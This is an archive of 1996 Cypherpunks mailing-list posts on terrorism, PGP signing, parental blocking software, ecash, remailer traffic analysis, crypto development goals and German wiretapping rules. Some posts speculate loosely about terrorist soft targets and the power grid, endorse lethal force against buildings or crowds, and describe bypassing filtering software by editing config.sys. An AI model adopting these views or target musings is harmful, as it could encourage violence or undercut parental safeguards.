> the target is military or civilian.)

     I think a clear line can be established between terrorist
incidents and battles/fights/raids/attacks carried out by other
"legitimate" troops or guerilla fighters. 

     Military troops can best be protected by 3 seperate methods:

    1)  Don't put them in situations were they are targets for terrorism 
        abroad. Soldiers and Marines exist to elivate the ENEMIES body
        counts, not ours. By putting troops trained to fight in defensive 
        passive positions you are exposing them to terrorist attacks, and 
        ruining their combat reflexes. 

     2) When they _are_ exposed, let them fight the fuck back. Rules of 
        engagment are simple. When fired on, shoot to kill. If the shot 
        comes from a building, take out the building. If from a crowd, 
        well, do you best, but _get the shooter_. 
 
     3) Again when operating in a potentially deadly enviroment, follow the
        standard anti-terrorist rules. Vary your routines, don't bunch up,
        Be unpredictable. None of these were done in the Saudi blast, Nor 
        where they done in Beruit 12 years ago. 

> The focus of my comments was really on civilian or non-military targets.
> (Including destruction of government buildings, maybe. I'm not sure whether
> the Oklahoma City bombing and the recent Phoenix/Viper Militia case is
> "terrorism" in a formal sense, or counter-government action, but my point
> is that such things are likely to be happen.)

	IMO the Ok. bombing was a terrorist attack. The attack was carried
out by a civilian (in the sense that he was not acting as a part of any 
government, official or otherwise and not wearing a uniform etc.) 

> >Civilian targets are harder to protect, but certain steps can be
> >taken to lessen chances of a sucessful attack.
> Sure, any particular "soft target" can be hardened to some extent. But not
> all of them, and even harder sites can be reached. This is left as an
> exercise for the reader.
> (Hint: The Japanese cult's Sarin gas attack on the subways...there are tens
> of thousands of comparable targets in the U.S. alone. Look around, and ask
> what it would take to harden each one. A minor cryptographic connection is
> that hardening N of M sites makes the remaining M - N sites all the more
> tempting.)

     I kinda mis-spoke. The way I should have put it was: 	
	
     Steps can be taken to make attacks less likely, and to make it easier 
to capture the individuals responcible afterwords. 

    Think about it. Why have we had so little terrorism in this country? 
This is one of the most diverse countries in the world, we allow damn near
anyone breathing into this country, yet we have much less terrorism than 
does England, France, Germany etc. 
     
     Why? IMO It is opportunity. Maybe everyone who emigrates here doesn't 
get rich, but they are almost _all_ better off than in their original
countries. By keeping this country as free as possible, and allowing the
free exchange of ideas, not jailing (too many) people for political/religious
opnions you at least give the appearance that they can change things w/out
killing things and breaking people. This makes it much harder for the 
potential terrs. to get the financial backing. It also reduces sympathy for 
them in the community. 

     IMO as long as people have the illusion of freedom and upwards 
mobility coupled with the ability to pray to the stupidity of their choice
things will maintain an even keel in this country. You will have the 
occasional UniBomber, but I don't think you will get anything like that 
Japanese Cult w/sarin. Then again we have come close. 
 
> >Another method, and this would be very unpopular (and
> >hypocritical of the US) would be simply to announce that we (the Country)
> >are going to hold the _manufacturing_ nation responcible for the use of
> >weapons of mass destruction. So if Soviet Nerve Gas is used, we gas a
> >city in the Soviet Union. MAD carried to a lower level.
> You are essentially making my point, that the biggest danger of the current
> responses to terrorism is that nations will turn to national terrorism and
> police state tactics.

	I missed that in your original post. 

> >A third option is quite simply to buy as much of it as possible.
> No, wouldn't work. As with the "War on (Some) Drugs," all this does is
> raise the price a bit, actually making it a more tempting market for many
> to get into.

	If the US were to offer Russia $3 billion (or whatever) 
in a one time take it or leave it for their entire chemical weapon stock,
it might get the soviet shit off the market. The nuclear stuff is a little 
easier to store (I think) and it would be a harder sell. 

	I agree tho' that it isn't possible to buy out the market. 
 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 4 Jul 1996 13:30:52 +0800
To: wb8foz@nrk.com
Subject: Re: Lack of PGP signatures
Message-ID: <2.2.32.19960704022445.00e26020@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:45 PM 7/3/96 -0400, David Lesher wrote:
>> I am wondering why there is not a signing option that ignores all
>> non-printing characters.  Might fix some of these problems...  (Can anyone
>> think of a reason this would be a "Bad Thing(tm)"?)
>
>Moving spaces could change meaning on a legal doc.
>
>A nonsense example is the alt.folklore.urbane "cow orker" tag...

I was thinking of carriage return/line feed combinations...  Spaces are
obvious and print.  I was thinking of non-printing characters that are
non-obivious when inserted.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 4 Jul 1996 10:47:48 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: blocking software & brock meeks
Message-ID: <v0151011dae00bfee919a@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


Since I wrote most of the dispatch M. Nuri is talking about, I'll take a
moment to respond to his points below.

First, neither Brock nor I intends to "harass" the blocking software companies.

Seocnd, I wouldn't be nearly as skeptical of their efforts if they'd
honestly admit what they block. Right now, parents don't _know_ the extent
to which Junior is kept from educational and political sites.

This was the point of the article; I fear you missed it entirely.

-Declan



>sent this to Brock Meeks re: his latest column
>I also ask cpunks not to harass these companies or their users--
>it's a solution that's working.
>
>------- Forwarded Message
>
>To: brock@well.com
>Subject: cyber blocking software
>Date: Wed, 03 Jul 96 12:48:49 -0700
>From: "Vladimir Z. Nuri" <vznuri@netcom.com>
>
>
>I read your columns regularly. outstanding work.
>
>regarding your recent dispatch: please do not harass the
>blocking software companies too much. they are simply based
>on a different premise than the regular net. the internet
>starts out with, "everybody can access everything". they
>start out with, "only stuff we approve of can be accessed".
>
>what their system shows is that you will always have disagreement
>and controversy whenever this software is employed, whereever
>subjectivity is involved. it is a very legitimate and worthwhile
>service for parents who would rather "err on the side of caution".
>
>but far
>better to have these organizations arguing & bickering with who they
>censor than to have the people who are censored suing the
>government. the people who want free net access have it, and
>are unbothered by these controversies.  in other words,
>by moving the controversies to places where they are locally
>contained (i.e. among the blockers and blockees) the rest
>of the surfing public is unaffected and perhaps even protected
>from harassment.
>
>so you see? there is all kinds of ranting about censorship going
>on, but it has nothing to do with the way the vast majority uses
>the internet. it's completely voluntary. it's the perfect solution.
>so far, nothing the blocking companies do can affect the net as
>a whole. they are largely predicated on that function.
>
>in a real sense they are providing very general services of
>"rating web sites our customers will be most interested in".
>and you realize, even the Point Communications awards are the
>exact same thing.
>
>so again, please do not harass the companies. it's a solution
>that does work. the existence of controversy does not prove
>it doesn't work. it in fact proves that it does work.
>
>
>
>------- End of Forwarded Message






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 4 Jul 1996 12:59:24 +0800
To: John Deters <jad@dsddhc.com>
Subject: Re: The Net and Terrorism
In-Reply-To: <2.2.32.19960703005232.009d18e4@labg30>
Message-ID: <Pine.LNX.3.93.960703191544.124B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jul 1996, John Deters wrote:
> At 03:44 PM 6/30/96 -0700, you wrote:
> >in reality. it seems to me no nation-state has ever experimented with
> >trying to take away the root causes of violence and discontent. 
> But here in the U.S., we ARE trying to take them away via the educational
> system.  About the only thing we can effectively do is to provide more
> educational opportunities that denounce violence, racism, hate crimes, etc.
> However, you cannot eliminate discontent without eliminating greed; which is
> simply not possible.

     <snort> Bullshit. The root causes of violence and discontent are not 
persistent "us against themism". The root causes are situation dependent,
but would fall into 3 areas:

	1) boredom.
	2) lack (of food, housing, land, etc. Also includes perceived lack)
	3) Response to the perceived threat against the 2).

    It is my opnion that the education system in this county is a breeding 
ground for violence and discontent for in several ways:

	1) By almost totally failing to prepare students for "Real Life"
           while at the same time telling them what wonderful intelligent
           humans they are, it sets them up for 1 & 2 above. 

        2) Given the revisionist teachings often presented in schools, and 
           the current practice of "blame the white man", certain ignorant
           (see 1) individuals feel threatened leading to 3 above. 

	As I said in an earilier post, IMO one of the things that has
kept the levels of terrorism down in this country (unless you count things
like the KKK as terrorism...just thought of that hmmmm...again caused by 
the 1 & 3 as well as occasionaly 2 above). 

> The countries that sponsor terrorists have not been noted for their
> successful educational systems.  And they certainly are not going to listen
> to Western discussions on how best to solve their "problems".

      They have also not been known for their freedoms. The USSR 
supposedly exprted quite a bit of terrorism, especially by proxie. They 
have a decent educational system, but free thought is discouraged. 

> My point here is that this behavior is explicitly protected by the Bill of
> Rights.
> So, do you not accept that we have the environment right here that can breed
> violence and discontent?
> For the most part, I see kids today being educated with much less "hatred"
> than even my age group was brought up with (I'm 34).  We're moving in the
> right direction by incorporating diversity in education, entertainment and
> the workplace, but we can never hope to erase it all.  And if even one
> person retains the seed of violence, they can employ the "warfare of the
> weak" -- terrorism.

     Agreed. 

> psychological profiles of people who commit acts of terror.
> >the "problem" of terrorism will be solved when we take the view
> >that insanity and violence is *not* 
> >a natural aspect of human behavior (as TCM tends to suggest), 

	I'd say they _are_ natural. It is natural and healthy to act
violently at times, and insanity is simply a broken [mind brain] shit
happends. 

> >and that
> >there are specific environmental conditions that breed it. like
> >malaria, if you take away the swamplike breeding grounds, you will
> >largely remove it. such a thing is a radical hypothesis, but one that
> >nonetheless has never really been tested in practice.
> As I said above, we can reduce some of the breeding grounds, but we can not
> eradicate them all.  And if one were to conduct a study correlating racist
> attitudes with education with numbers of acts of terror, we might find a
> direct correlation.

	I doubt it. THere are quite a few well educated racists. 

> away.    The point of Tim's essay was that, yes, the net can be used by the
> evil monsters, and yes, the evil monsters are here, and no, the evil
> monsters are not going away any time soon.  Why did you feel it necessary to
> try to slam his fairly well-researched and quite obvious conclusion?

	The monsters are in our heads. They are us. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Thu, 4 Jul 1996 13:11:00 +0800
To: Alan Olsen <markm@voicenet.com>
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
Message-ID: <1.5.4.16.19960704020949.330fe182@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 05.30 PM 7/3/96 -0700, Alan Olsen wrote:
>At 06:58 PM 7/3/96 -0400, Mark M. wrote:

>>If the child is creative enough, he will be able to boot DOS from a bootdisk
>>and remove the line from config.sys that starts up the filtering software.

>Or just remark it out and reboot.  Or does the filtering software make it so
>they cannot use an editor as well...?
>
>Sounds like a pretty easy thing to bypass given a small amount of clues.
>(Makes me wonder how the usually clueless parents are going to block access
>to their kids who usually understand the technology better than they do.)

It would not have stopped me.

===============================================================================
David Rosoff (nihongo o sukoshi dekiru)  ---------------->  drosoff@arc.unm.edu
For PGP key 0xD37692F9, finger drosoff@acoma.arc.unm.edu
0xD37692F9  Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
Do you know who's reading your email? ---> http://www.arc.unm.edu/~drosoff/pgp/
Anonymous ok, PGP ok.  If it's not PGP-signed, you know that I didn't write it.
=== === === === === === === === === === === === === === === === === === === ===
"Truth is stranger than fiction, especially when truth is being defined by the
O.J. Simpson Defense Team." -Dave Barry


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdsleRguzHDTdpL5AQGYYQQAirqoel38eJrNBo17WKYlKZ5SYT8n+4dM
Uil2vBHosxIOdGo8vmarHoxVALF7L31wXbFJ6pdv7p/qHAMvzDW3RetJQhDAc42P
lZY0qMnRonoA6tKQbTcx8zkoRevGBEzTjxkVUyfRDHJCez7U42Mlvif728Faj4Dg
9ceqFYutAjU=
=/cfm
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 4 Jul 1996 12:55:30 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Net and Terrorism.
In-Reply-To: <adff2067000210047c89@[205.199.118.202]>
Message-ID: <Pine.LNX.3.93.960703200858.124D-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jul 1996, Timothy C. May wrote:
> At 9:13 PM 7/2/96, snow wrote:
> >On Tue, 2 Jul 1996, snow wrote:
> >> Gain control of the power grid (I don't know how possible this is)
> >        Ummm... Just in case anyone is thinking it right now, NO, I
> >didn't. If this outage was deliberate, I had nothing to do with it. I was
> >just postulating possibilities.
> Hmmhhh....I post about the "Net and Terrorism" on Sunday, and the Viper
> Militia and their plans to blow up several courthouses in Phoenix are
> revealed a few hours later....Snow posts about using computers to knock out
> the power grid, and a few hours later power goes out over 15 western
> states....
> Coincidence? I think not.
> But we can test this hypothesis:
> "Alien spaceship images will appear in thousands of darkened rooms and will
> trigger mass hysteria."

	I mentioned this to my wife. Her reply: "I think mass hysteria 
already exists".

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Thu, 4 Jul 1996 14:12:36 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Lack of PGP signatures
In-Reply-To: <Pine.GUL.3.94.960703171630.5088N-100000@Networking.Stanford.EDU>
Message-ID: <m2pw6cn22m.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Rich" == Rich Graves <llurch@networking.stanford.edu> writes:

Rich> On Wed, 3 Jul 1996, Charles Watt wrote:
>> -----BEGIN PRIVACY-ENHANCED MESSAGE-----

Rich> And then there's the part about it being ugly as sin ...

(defun gnus-article-hide-pem (&optional arg)
  "Toggle hiding of any PEM headers and signatures in the current article.
If given a negative prefix, always show; if given a positive prefix,
always hide.  Adapted from gnus-article-hide-pgp."
  (interactive (gnus-hidden-arg))
  (unless (gnus-article-check-hidden-text 'pem arg)
    (save-excursion
      (set-buffer gnus-article-buffer)
      (let ((props (nconc (list 'gnus-type 'pem) gnus-hidden-properties))
	    buffer-read-only end)
	(widen)
	(goto-char (point-min))
	;; hide the horrendously ugly "header".
	(and (search-forward "\n-----BEGIN PRIVACY-ENHANCED MESSAGE-----\n"
			     nil
			     t)
	     (setq end (1+ (match-beginning 0)))
	     (gnus-hide-text
	      end
	      (if (search-forward "\n\n" nil t)
		  (match-end 0)
		(point-max))
	      props))
	;; hide the trailer as well
	(and (search-forward "\n-----END PRIVACY-ENHANCED MESSAGE-----\n"
			     nil
			     t)
	     (gnus-hide-text (match-beginning 0) (match-end 0) props))))))

-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Remailer Administrator <mix-admin@nym.alias.net>
Date: Thu, 4 Jul 1996 11:35:33 +0800
To: cypherpunks@toad.com
Subject: Wanted: NNTP posting access for remailers
Message-ID: <199607040046.UAA04545@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Would anyone out there be willing to give NNTP posting or transfer
privileges to anon.lcs.mit.edu?

Because of recent spams through mail2news@anon.lcs.mit.edu, I may
loose my news posting privileges to the news server I have been using.
Though I try to resolve all complaints I receive, other complaints
have been sent to other postmasters in the domain, who don't seem to
want to hear about these problems.

If you run a news server and would like to help people posting
anonymous messages, please consider allowing posts from
mail2news@anon.lcs.mit.edu.  Ideally you would also be in a position
to receive mail at some of the relevant postmaster aliases in your
domain, and would not mind forwarding misdirected complaints to me so
that I can deal with them.  Alternatively, if you are willing to give
me "IHAVE" priviliges, I can possibly set things up with an initial
"Path:" header that guarantees most complaints will go directly to me.

Thanks,
- -mix-admin@anon.lcs.mit.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMdsT70TBtHVi58fRAQHQ0QP/U3Jn7sL9+k3aUr+qw4WdDxef/lIeu3xO
BwdO8zlNPavJgbxuunR81n011jGy80l7qnc+DpvtuEEQqszLMcMO/4zHw/VfVOY8
08nxE8+IkF/FE66vJdnU7O3I1mIjtbF8ixcm9FOwqoehSLJB40tXy6wu6KV663TQ
fmy/Gz5XDe8=
=Gp4D
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 4 Jul 1996 12:33:00 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: Computer-Aided Revolution
In-Reply-To: <199607032257.PAA16812@mail.pacifier.com>
Message-ID: <199607040148.UAA04518@homeport.org>
MIME-Version: 1.0
Content-Type: text


xntp (extended network time protocol) can be accurate to a few
tenths of a second over a serial link, possibly better.  It can get to
thousandths or better over an ethernet.

GPS can also provide a very accurate time signal (about $300 for the
hardware, which is becoming relatively common.)

Adam

jim bell wrote:

| I've thought of an application for a "revolutionary" program for peaceful 
| protest, but one that requires that a substantial number (1000) of people 
| have access to computer time synchronized to 1 second, ideally 0.1 second.  
| How good would a time sync over the  net typically be?
| 
| Jim Bell
| jimbell@pacifier.com
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 4 Jul 1996 15:51:29 +0800
To: Simon Spero <cypherpunks@toad.com
Subject: Re: ecash thoughts
Message-ID: <199607040424.VAA02562@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:53 PM 7/3/96 -0400, Simon Spero wrote:

>2) If ecash is used to create a new currency- i.e. the value of a unit of 
>the ecash is not tied to any single existing currency, what should the 
>value of one currency unit  be set at? (let's call it a Turing)

Low, maybe a tenth of an American cent.  But probabilistic payment should be 
used to allow the minimum average payment to go way below this, perhaps to 
an unlimited extent.  The reason is simple:  The cost of providing net 
transactions, and electronic transactions in general, can be expected to 
drop exponentially, just like the cost of telecommunications and CPU power 
do.  Any arbitrary limit to how low they can go will act somewhat akin to 
the minimum wage:  It will deter development of any product or service whose 
perceived value is less than this arbitrary minimum.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 4 Jul 1996 12:37:14 +0800
To: alano@teleport.com (Alan Olsen)
Subject: Re: Lack of PGP signatures
In-Reply-To: <2.2.32.19960703220436.00e93fe8@mail.teleport.com>
Message-ID: <199607040145.VAA05041@nrk.com>
MIME-Version: 1.0
Content-Type: text


> I am wondering why there is not a signing option that ignores all
> non-printing characters.  Might fix some of these problems...  (Can anyone
> think of a reason this would be a "Bad Thing(tm)"?)

Moving spaces could change meaning on a legal doc.

A nonsense example is the alt.folklore.urbane "cow orker" tag...

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 4 Jul 1996 13:25:16 +0800
To: cypherpunks@toad.com
Subject: What remains to be done.
Message-ID: <Pine.SUN.3.94.960703055812.13232A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



Because I am not myself much of a programer, and because I have to find
excuses to feel useful, I thought I would annoy everyone with my ideas
about where c'punks might want to direct their efforts at encryption
development.

Of course any suggestion at direction tends to require a disclosure of the
assumptions one is working from.  The following are mine:

1.  The most interesting crypto uses and implementations seem to come from
grassroots programers, not large organizations.

Remailers, PGP, Curve Encrypt, Private Idaho, mixmaster, premail, and
magic money all were the results of "grassroots" efforts.  None of these
have been produced from massive corporate R and D programs, and most have
been the result of predominately a single programmer's efforts.

2.  The most useful crypto applications out there have tended to survive
by using crypto that looks forward, not to the past, or the present.  This
is generally manifest in the inclusion or easy use of multiple methods.

Zimmerman's selection of IDEA over DES, PGP's multiple key sizes, Curve
Encrypt's 3DES/IDEA option, are all examples of an effort to design
systems which will be useful tommorow, not just today.  PGPlib seems to
pick up this trend where PGP 2.x went awry.

3.  In so far as proliferation is important, the impact of crypto
applications and implementations is directly tied to ease of use.

If PGP has failings, one must be that it can be immensely intimidating to
the novice.  

4.  Increasingly cryptography is defying attempts at conventional
regulation.

5.  #4 will eventually spur sovereigns to rather drastic methods to defy
#4.

6.  Secure Communications, and transparent crypto are a Good Thing.


Assuming the above, I think it is apparent that crypto development should
be focused on a few general points and a few key areas.

As to general points, I think the clear concentrations include:


A.  Increasing the ease of use.

Perhaps I should have put this as #1, because really among those things
which I suggest in this post, I think this is of primary importance.  It
cannot be stressed enough that encryption must be transparent, easy to
use, but at the same time make its presence just apparent enough to
encourage its use, and to make users note its absence.

Crypto will have its most significant impact, its most liberating results,
and be self assuring only to the extent that it is not a novelty, but an
assumption.

Please, authors, coderpunks, make crypto easy to use, but flexible enough
so that adept and expert users can modify functional aspects.  (Key
generation, key size, exponent size, algorithm selection, level of
verbosity and suchlike should find their way into an expert menu
somewhere).

B.  Multiple encryption method support/larger key sizes.

While I may be more paranoid than some, or even most, I think it is
crucial to provide for the possibility that strong encryption may one day
face a total ban in more countries.  To avoid the chilling effect that
this would certainly have on development, it is of key importance to
permit applications and implementations to nexus with several methods, and
to allow what may today seem like extrodinarily large key sizes.  (256
bits would not be unreasonable in my view, particularly so where the user
was given the option of selecting a ~128 or so bit method like IDEA or
3DES at their option (consistent with A. above).

C.  Anonymous communication.

I'm not sure this needs much explanation.

D.  True stego.

Today it is a simple matter to identify encrypted traffic.  This is the
key flaw in what I will call (at risk of sounding like a white paper) the
NEI (National Encryption Infrastructure).  It subjects users to very
effective and easy to implement traffic analysis.  While I understand the
temptation to use checksum like methods to speed the key checking process,
at some point I am of the view that this convenience will come back to
haunt crypto.


Given these areas, what specific applications might be the best to look
into for the grassroots crypto advocate/coder?

A.  Methods to run secure websites on insecure servers.

A thread on 'punks last month, I am of the view that local decryption of
web pages is essential to the development of coercion free web pages.
Estlablishing a truely secure web page today requires the server to be
extra-terratorial, in a secure physical location, and requires such
lengths to defeat traffic analysis (which lengths must be applied to the
actual network logistics, rather than the software logistics) so as to be
impractical to all but institutional resources.  The best effort I have
seen is in European Union Bank (www.eub.com) or (www.eub.net) [neither of
which I recommend you use for deposits] and it still falls quite short.

A software solution which permits local decryption makes traffic analysis
less useful, presents the opportunity to use front end and disposable www
pages on domestic ISPs while imposing no liability on the ISP itself, and
opens several more effective traffic analysis deterants.

Ideally, both web proxies (for servers as well as clients) and local
decryption will be written allowing both server and user a degree of
double blind operation as well as easy disposability of front ends.

A Netscape plugin for local decryption of web pages and proxy forwarding
of WWW form submissions to the server is a MUST.

Is anyone considering work on these?


B. More effective message pools.

Really this is the only practical and most effective method to defeat
traffic analysis of e-mail communications.  Why do you think it is that
informants always communicate with the FBI in the classified ads?

This has been discussed again and again, yet I am aware of no serious
effort to construct an effective server or client to implement it more
effectively than USENET (which seems to be hopelessly slow and prone to
drop postings regularly)

I am encouraged by the new mixmaster model, but I have yet to read the
entire abstract carefully.


If the goal is, as I believe it should be, to make encryption accessible
and understood by, if not everyman and joe sixpack, joe digitalsixpack,
then it strikes me that the focus should be on WWW browsers and servers,
(Netscape like material), popular mailing programs (Eudora), and the
building blocks of the network, the point of origin, and the point of
final destination.

Point to point, grassroots plug ins to existing de facto standards, and
ease of use, ease of use, ease of use.

cypherpunks write code.

Call me "half a cypherpunk"

--
I hate lightning.  (unicorn@schloss.li)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Sat, 6 Jul 1996 13:36:38 +0800
To: cypherpunks@toad.com
Subject: Re: hard drive encryption
Message-ID: <2.2.32.19960704052640.006a79d8@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain



Thank you all for your comments... to those who suggested
I remove and hide the drive, I was intending to do so, but
still want a way to encrypt it's contents.  Call me paranoid...
For those who suggested software, thank you, I'll be d/ling
and evaluating all of it, and appreciate the varied responses..
//cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.org (Ulf Moeller)
Date: Thu, 4 Jul 1996 08:43:15 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: Info on alleged new German digital wiretapping law?
In-Reply-To: <Pine.GUL.3.94.960702223715.28261E-100000@Networking.Stanford.EDU>
Message-ID: <m0ubYpS-00009UC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


> > > http://fight-censorship.dementia.org/fight-censorship/dl?num=3027

> So what's the prospect for implementation? The claim is that law enforcement
> is supposed to have a back door to every computer system. Are we talking
> about escrow of root passwords, or what?

No. There are two points:

1) The network operators have to create a wiretapping system to be
approved by the Regulation Authority, and operate dedicated digital
lines for law enforcement access.  As I understand it, Internet
providers could be forced to duplicate IP packets to that line, when
wiretapping has been ordered.

2) They have to keep files of customer data (name, address, etc.) that
the Regulation Authority can access secretly at any time.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair" (Time Keeper) <fair@clock.org>
Date: Thu, 4 Jul 1996 14:03:48 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: blocking software & brock meeks
Message-ID: <v02140b28ae00aadf9ca1@[199.43.99.154]>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir,
        I agree with you in general, however, Brock and Declan have a point
to make too: these companies need to differentiate themselves based on two
things:

1. basic philosophy of filtering (why they filter what they filter).

2. diligence in keeping up their databases.

Brock & Declan are right to expose the basic filtering philosophies of the
different companies, so that those of us who may wish to avail ourselves
their services know exactly what we're getting (or rather, not getting).

In the end, the market will choose between the simple "no porn" philosophy
(for whatever your definition is of that), and the "christian family values
approved by the christian coalition" philosophy (with, one hopes, a whole
lot of other points on the spectrum in the middle). However, the consumers
cannot make this choice absent the information; Brock & Declan have done
everyone a service by shining some light on this.

What I'm surprised about is that these companies apparently aren't already
trumpeting their philosophies of filtering themselves. The principle
differentiator for this market is not the software - there really aren't
that many ways to filter this stuff, and these companies ought to share
their techniques in that area so that they can all be more effective and
thus serve their customers better. The real differentiator is what's in
their databases, which (one presumes) is driven by each of their
philosophies of what is "harmful" to minors.

One wonders if these companies might be embarassed to actually take a
public position on this burning issue: just exactly what *is* "harmful" to
minors? Personally, I fail to see how they can avoid it - it is the essence
of their entire business.

        Erik Fair <fair@apple.com>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 4 Jul 1996 16:25:07 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Lack of PGP signatures
In-Reply-To: <2.2.32.19960703220436.00e93fe8@mail.teleport.com>
Message-ID: <Pine.LNX.3.93.960703230954.124G-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jul 1996, Alan Olsen wrote:
> I am wondering why there is not a signing option that ignores all
> non-printing characters.  Might fix some of these problems...  (Can anyone
> think of a reason this would be a "Bad Thing(tm)"?)

     IANACE, but off the top of my head I'd say clear signing binaries. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Thu, 4 Jul 1996 14:15:30 +0800
To: cypherpunks@toad.com
Subject: Re: anonymous remailers
Message-ID: <01I6NJC6YZES91X6WG@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[ To: Cypherpunks ## Date: 07/02/96 03:36 pm ##
  Subject: Re:  anonymous mailing lists ]

>Date: Sat, 29 Jun 1996 09:40:51 -0700
>From: Hal <hfinney@shell.portal.com>
>Subject: Re:  anonymous mailing lists

>Wei Dai did some nice statistical analysis of this type of attack
>sometime a year or two ago.  Even with countermeasures such as you
>suggest, if they are not perfect, so some information leaks correlating
>incoming and outgoing messages, Wei showed that it was possible to
>deduce the owners of the nyms surprisingly quickly.

Yes, this makes sense.  As I said before, this is related to the way
timing attacks work.  A little correlation that shouldn't be there,
over many messages, turns out to be enough to unravel a lot of
information.

>The countermeasures do work - if you get and send exactly 50 pieces of
>4K byte email every day, no matter what, then correlations don't exist
>- but they are expensive to do perfectly.

At the very least, this is susceptible to a flooding attack.  At any
rate, this is analogous to the fixed-delay solution to timing
attacks.  (Make all PK operations with long-term secret keys take
the same amount of time.)  Unfortunately, I can't see a solution to
this that's analogous to blinding out the values in the timing
attacks.

>Hal

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com / kelsey@counterpane.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMds0LUHx57Ag8goBAQHPeQP+JH4b7bJCLW3ttqQ+v0XzEcbCaeOg9LqR
e+xuaLx2AjCx5N+V2q3xeJTAldfZZ5YFwCUq3KgpnBAbDvJ1my0hCGmKj+1uXQTp
SFSciq5oItMo2kwncbez2RaN/0aqcDSOGnc4ddfO4Ur7H7k+aLOQuaAUvcvDpV1p
C8up+1PSPW0=
=60Zh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Thu, 4 Jul 1996 14:29:05 +0800
To: cypherpunks@toad.com
Subject: Re: anonymous remailers
Message-ID: <01I6NJCHTC8Q91X6WG@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


